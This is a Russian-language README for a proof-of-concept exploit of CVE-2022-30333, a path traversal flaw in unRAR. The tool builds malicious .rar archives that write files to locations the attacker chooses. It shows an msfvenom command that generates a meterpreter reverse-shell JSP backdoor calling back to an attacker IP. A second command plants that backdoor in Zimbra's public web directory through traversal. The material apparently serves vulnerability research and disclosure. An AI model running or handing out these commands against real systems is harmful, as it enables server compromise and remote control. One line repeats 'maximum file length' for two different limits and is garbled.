
Эксплойт доказательства концепции для CVE-2022-30333 обхода пути в unRAR, генерирующий вредоносные .rar-файлы для извлечения произвольных полезных нагрузок в указанные атакующим расположения.
Доказательство концепции для CVE-2022-30333 - уязвимость обхода пути в unRAR версиях до 6.11. Я создал это как демонстрацию эксплойта для статьи на AttackerKB и надеюсь вскоре включить его в модуль Metasploit!
Вкратце: вы указываете цель (включая обход пути) и некоторые файловые данные, а этот инструмент сгенерирует .rar, который извлечёт этот файл в указанное место. Максимальная длина файла — 104 байта, а максимальная длина файла — 4096 байт. (Это не связано с уязвимостью, это просто то, что я выбрал при создании файла).
Например, сгенерируйте бэкдор с помощью msfvenom:
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp
Затем создайте .rar файл, размещая .jsp в интересном месте:
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar